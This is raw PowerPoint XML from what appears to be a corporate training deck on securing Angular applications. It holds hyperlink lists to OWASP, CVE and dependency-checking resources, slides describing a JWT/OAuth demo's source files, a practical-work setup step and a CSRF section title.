Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jwtk/jjwt"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gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/blob/PW-JWT-OAuth/bookstore/src/main/java/com/worldline/bookstore/security/jwt/TokenProvider.java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/blob/PW-JWT-OAuth/bookstore/src/main/java/com/worldline/bookstore/web/rest/UserJWTController.java" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/blob/PW-JWT-OAuth/src/app/services/auth/auth-jwt.interceptor.t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owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)"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docs.angularjs.org/api/ng/provider/$httpProvider" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angular.io/api/common/http/HttpClientXsrfModule" TargetMode="Externa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2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ww.owasp.org/index.php/Top_10_2017-A3-Cross-Site_Scripting_(XSS)"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hyperlink" Target="http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html" TargetMode="External"/><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hyperlink" Target="http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html"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hyperlink" Target="https://angular.io/docs/ts/latest/cookbook/aot-compiler.html"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hyperlink" Target="http://caniuse.com/#search=csp"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hyperlink" Target="https://csp-evaluator.withgoogle.com/"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43.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hyperlink" Target="http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-Top_10" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805"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hyperlink" Target="https://zen.myatos.net/preview?previewPostId=10794850" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/"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www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F"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hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.dependencytrack.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.j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45.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://retirejs.github.io/retire.js/"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jeremylong.github.io/DependencyCheck/dependency-check-maven/configuration.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jeremylong.github.io/DependencyCheck/dependency-check-maven/index.html" TargetMode="Externa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hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/home.cfm" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jeremylong/DependencyCheck/tree/master/dependency-check-maven" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyclonedx.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kazan.atosworldline.com/dependency-track" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.dependencytrack.org/" TargetMode="Externa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hyperlink" Target="https://zen.myatos.net/preview?previewPostId=11975178" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spdx.org/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zen.myatos.net/user/in/NOURREDINE_KHADRI/files/MC-s0YkrkWZAKaHfO1ejCZ6BQ%2C%2C/upload/Dependency-Track_KUC8.mp4"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oauth.net/2/" TargetMode="External"/><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hyperlink" Target="https://www.w3.org/TR/cors/"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hyperlink" Target="https://en.wikipedia.org/wiki/JSR_250"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tools.ietf.org/html/rfc7519"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haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx" TargetMode="External"/><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hyperlink" Target="http://en.wikipedia.org/wiki/JSONP"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s://docs.angularjs.org/api/ng/directive/ngCsp" TargetMode="External"/><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hyperlink" Target="https://angular.io/docs/ts/latest/guide/security.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.angularjs.org/guide/security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://retirejs.github.io/retire.js/"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gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack" TargetMode="External"/><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69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app" TargetMode="External"/><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hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/tree/master" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/refs?ref=master&amp;search=PW"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96000" y="1047600"/>
            <a:ext cx="5184312" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196000" y="2824802"/>
            <a:ext cx="4950000" cy="1115100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Training by SDCO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4202846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7584" y="699542"/>
            <a:ext cx="6696744" cy="720080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JWT OAuth Demo with AngularJS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="2067694"/>
            <a:ext cx="8640960" cy="1656184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>app.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    : the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>angularjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> app module    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>controllers.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> : controllers which defines login and logout functions    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Authenticator.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: the REST endpoint for login, authentication and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>DefaultJWTTokenGenerator.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: the default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>JWTTokenGenerator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> implementation based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>nimbus-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>jose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>jwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>JWTRequestInterceptor.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: an Interceptor/filter that checks the JWT validity on each request    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15447963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JWT_OAuth_Angular2_demo - juin 08 2017 01.54.04.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200" y="20538"/>
            <a:ext cx="8229600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336775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28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771550"/>
            <a:ext cx="6696744" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JWT OAuth Demo with Angular 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1779662"/>
            <a:ext cx="8640960" cy="2160240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>oauth-jwt-service.ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: service which defines login and logout functions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>auth-jwt.interceptor.ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> $http interceptor service for adding the JWT in the Authorization header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>UserJWTcontroller.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: the REST endpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>authentication     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>TokenProvider.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  : the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>service which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>provides utilities to generate/validate JWTs   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>(based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>jjwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> module)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>JWTFilter.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>a filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>that checks the JWT validity on each request    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34981059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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW - JWT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Installation : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t>clone -b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>PW-Initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	2 - Follow the readme</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>/PW-JWT-OAuth.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41251325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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
